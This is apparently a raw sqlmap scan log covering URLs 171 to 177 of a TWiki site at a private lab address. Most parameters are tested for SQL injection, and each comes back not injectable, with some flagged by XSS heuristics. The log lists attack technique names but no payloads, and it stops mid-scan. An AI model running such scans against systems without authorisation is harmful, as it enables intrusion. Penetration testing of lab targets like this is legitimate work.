[20:09:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:09:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:09:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:09:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:09:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:09:40] [INFO] testing 'MySQL inline queries' | |
[20:09:40] [INFO] testing 'PostgreSQL inline queries' | |
[20:09:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:09:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:09:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:09:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:09:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:09:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:09:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:09:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:09:44] [INFO] testing 'Oracle AND time-based blind' | |
[20:09:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:09:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:09:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:10:01] [WARNING] GET parameter 'skin' is not injectable | |
[20:10:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 171: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.79&rev2=1.78 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:10:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.79&rev2=1.78' | |
[20:10:01] [INFO] testing connection to the target URL | |
[20:10:01] [INFO] testing if the target URL is stable | |
[20:10:02] [INFO] target URL is stable | |
[20:10:02] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:10:02] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:10:02] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:10:02] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[20:10:02] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:10:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:10:03] [WARNING] reflective value(s) found and filtering out | |
[20:10:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:10:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:10:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:10:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:10:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:10:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:10:06] [INFO] testing 'MySQL inline queries' | |
[20:10:06] [INFO] testing 'PostgreSQL inline queries' | |
[20:10:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:10:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:10:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:10:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:10:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:10:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:10:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:10:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:10:10] [INFO] testing 'Oracle AND time-based blind' | |
[20:10:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:10:11] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:10:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:10:23] [WARNING] GET parameter 'rev1' is not injectable | |
[20:10:23] [INFO] testing if GET parameter 'rev2' is dynamic | |
[20:10:23] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[20:10:23] [INFO] GET parameter 'rev2' is dynamic | |
[20:10:24] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[20:10:24] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[20:10:24] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[20:10:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:10:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:10:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:10:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:10:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:10:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:10:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:10:32] [INFO] testing 'MySQL inline queries' | |
[20:10:33] [INFO] testing 'PostgreSQL inline queries' | |
[20:10:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:10:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:10:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:10:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:10:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:10:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:10:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:10:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:10:40] [INFO] testing 'Oracle AND time-based blind' | |
[20:10:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:10:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:10:53] [WARNING] GET parameter 'rev2' is not injectable | |
[20:10:53] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 172: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.78 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:10:53] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.78' | |
[20:10:53] [INFO] testing connection to the target URL | |
[20:10:54] [INFO] testing if the target URL is stable | |
[20:10:54] [INFO] target URL is stable | |
[20:10:54] [INFO] testing if GET parameter 'rev' is dynamic | |
[20:10:55] [WARNING] GET parameter 'rev' does not appear dynamic | |
[20:10:55] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[20:10:55] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[20:10:55] [INFO] testing for SQL injection on GET parameter 'rev' | |
[20:10:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:10:55] [WARNING] reflective value(s) found and filtering out | |
[20:10:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:10:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:10:57] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:10:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:10:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:10:59] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:10:59] [INFO] testing 'MySQL inline queries' | |
[20:10:59] [INFO] testing 'PostgreSQL inline queries' | |
[20:11:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:11:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:11:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:11:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:11:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:11:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:11:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:11:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:11:03] [INFO] testing 'Oracle AND time-based blind' | |
[20:11:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:11:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:11:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:11:19] [WARNING] GET parameter 'rev' is not injectable | |
[20:11:19] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[20:11:19] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.78&rev2=1.77' | |
[20:11:19] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.77' | |
URL 173: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.79¶m2=1.79 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:11:19] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/WebHome?template=oopsmore¶m1=1.79¶m2=1.79' | |
[20:11:19] [INFO] testing connection to the target URL | |
[20:11:19] [INFO] testing if the target URL is stable | |
[20:11:20] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[20:11:20] [INFO] testing if GET parameter 'template' is dynamic | |
[20:11:20] [INFO] confirming that GET parameter 'template' is dynamic | |
[20:11:20] [INFO] GET parameter 'template' is dynamic | |
[20:11:20] [INFO] heuristics detected web page charset 'ascii' | |
[20:11:20] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[20:11:20] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[20:11:20] [INFO] testing for SQL injection on GET parameter 'template' | |
[20:11:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:11:20] [WARNING] reflective value(s) found and filtering out | |
[20:11:21] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:11:21] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:11:22] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:11:22] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:11:23] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:11:23] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:11:23] [INFO] testing 'MySQL inline queries' | |
[20:11:23] [INFO] testing 'PostgreSQL inline queries' | |
[20:11:23] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:11:23] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:11:24] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:11:24] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:11:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:11:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:11:25] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:11:26] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:11:26] [INFO] testing 'Oracle AND time-based blind' | |
[20:11:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:11:27] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:11:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:11:36] [WARNING] GET parameter 'template' is not injectable | |
[20:11:36] [INFO] testing if GET parameter 'param1' is dynamic | |
[20:11:36] [WARNING] GET parameter 'param1' does not appear dynamic | |
[20:11:36] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[20:11:36] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[20:11:36] [INFO] testing for SQL injection on GET parameter 'param1' | |
[20:11:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:11:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:11:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:11:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:11:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:11:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:11:41] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:11:41] [INFO] testing 'MySQL inline queries' | |
[20:11:41] [INFO] testing 'PostgreSQL inline queries' | |
[20:11:41] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:11:41] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:11:42] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:11:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:11:43] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:11:44] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:11:44] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:11:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:11:46] [INFO] testing 'Oracle AND time-based blind' | |
[20:11:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:11:55] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:12:03] [WARNING] GET parameter 'param1' is not injectable | |
[20:12:03] [INFO] testing if GET parameter 'param2' is dynamic | |
[20:12:03] [WARNING] GET parameter 'param2' does not appear dynamic | |
[20:12:03] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[20:12:04] [INFO] testing for SQL injection on GET parameter 'param2' | |
[20:12:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:12:05] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:12:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:12:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:12:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:12:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:12:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:12:08] [INFO] testing 'MySQL inline queries' | |
[20:12:08] [INFO] testing 'PostgreSQL inline queries' | |
[20:12:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:12:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:12:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:12:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:12:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:12:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:12:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:12:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:12:13] [INFO] testing 'Oracle AND time-based blind' | |
[20:12:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:12:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:12:26] [INFO] target URL appears to be UNION injectable with 10 columns | |
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y | |
[20:12:31] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') | |
[20:12:32] [INFO] target URL appears to be UNION injectable with 1 columns | |
[20:12:35] [WARNING] GET parameter 'param2' is not injectable | |
[20:12:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 174: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebPreferences?t=1441457711 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:12:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebPreferences?t=1441457711' | |
[20:12:35] [INFO] testing connection to the target URL | |
[20:12:36] [INFO] testing if the target URL is stable | |
[20:12:37] [INFO] target URL is stable | |
[20:12:37] [INFO] testing if GET parameter 't' is dynamic | |
[20:12:37] [WARNING] GET parameter 't' does not appear dynamic | |
[20:12:37] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[20:12:37] [INFO] testing for SQL injection on GET parameter 't' | |
[20:12:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:12:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:12:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:12:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:12:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:12:40] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:12:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:12:40] [INFO] testing 'MySQL inline queries' | |
[20:12:40] [INFO] testing 'PostgreSQL inline queries' | |
[20:12:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:12:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:12:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:12:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:12:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:12:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:12:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:12:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:12:44] [INFO] testing 'Oracle AND time-based blind' | |
[20:12:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:12:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:12:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:12:56] [WARNING] GET parameter 't' is not injectable | |
[20:12:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 175: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Preferences[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:12:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Web *Preferences[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[20:12:56] [INFO] testing connection to the target URL | |
[20:12:56] [INFO] testing if the target URL is stable | |
[20:12:57] [INFO] target URL is stable | |
[20:12:57] [INFO] testing if URI parameter '#1*' is dynamic | |
[20:12:57] [INFO] confirming that URI parameter '#1*' is dynamic | |
[20:12:57] [INFO] URI parameter '#1*' is dynamic | |
[20:12:57] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[20:12:57] [INFO] testing for SQL injection on URI parameter '#1*' | |
[20:12:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:12:58] [WARNING] reflective value(s) found and filtering out | |
[20:12:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:12:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:13:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:13:00] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:13:01] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:13:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:13:02] [INFO] testing 'MySQL inline queries' | |
[20:13:02] [INFO] testing 'PostgreSQL inline queries' | |
[20:13:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:13:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:13:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:13:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:13:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:13:04] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:13:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:13:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:13:06] [INFO] testing 'Oracle AND time-based blind' | |
[20:13:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:13:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:13:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:13:17] [WARNING] URI parameter '#1*' is not injectable | |
[20:13:17] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 176: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:13:17] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebPreferences?skin=print' | |
[20:13:17] [INFO] testing connection to the target URL | |
[20:13:17] [INFO] testing if the target URL is stable | |
[20:13:18] [INFO] target URL is stable | |
[20:13:18] [INFO] testing if GET parameter 'skin' is dynamic | |
[20:13:18] [INFO] confirming that GET parameter 'skin' is dynamic | |
[20:13:18] [INFO] GET parameter 'skin' is dynamic | |
[20:13:18] [INFO] heuristics detected web page charset 'ascii' | |
[20:13:18] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[20:13:18] [INFO] testing for SQL injection on GET parameter 'skin' | |
[20:13:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:13:18] [WARNING] reflective value(s) found and filtering out | |
[20:13:19] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:13:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:13:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:13:21] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:13:21] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:13:22] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:13:22] [INFO] testing 'MySQL inline queries' | |
[20:13:22] [INFO] testing 'PostgreSQL inline queries' | |
[20:13:22] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:13:22] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[20:13:23] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[20:13:23] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[20:13:24] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[20:13:24] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[20:13:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[20:13:25] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[20:13:25] [INFO] testing 'Oracle AND time-based blind' | |
[20:13:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[20:13:26] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[20:13:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[20:13:37] [WARNING] GET parameter 'skin' is not injectable | |
[20:13:37] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 177: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.18&rev2=1.17 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[20:13:37] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebPreferences?rev1=1.18&rev2=1.17' | |
[20:13:37] [INFO] testing connection to the target URL | |
[20:13:38] [INFO] testing if the target URL is stable | |
[20:13:38] [INFO] target URL is stable | |
[20:13:38] [INFO] testing if GET parameter 'rev1' is dynamic | |
[20:13:39] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[20:13:39] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[20:13:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[20:13:39] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[20:13:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[20:13:39] [WARNING] reflective value(s) found and filtering out | |
[20:13:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[20:13:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[20:13:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[20:13:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[20:13:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[20:13:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[20:13:43] [INFO] testing 'MySQL inline queries' | |
[20:13:43] [INFO] testing 'PostgreSQL inline queries' | |
[20:13:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[20:13:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
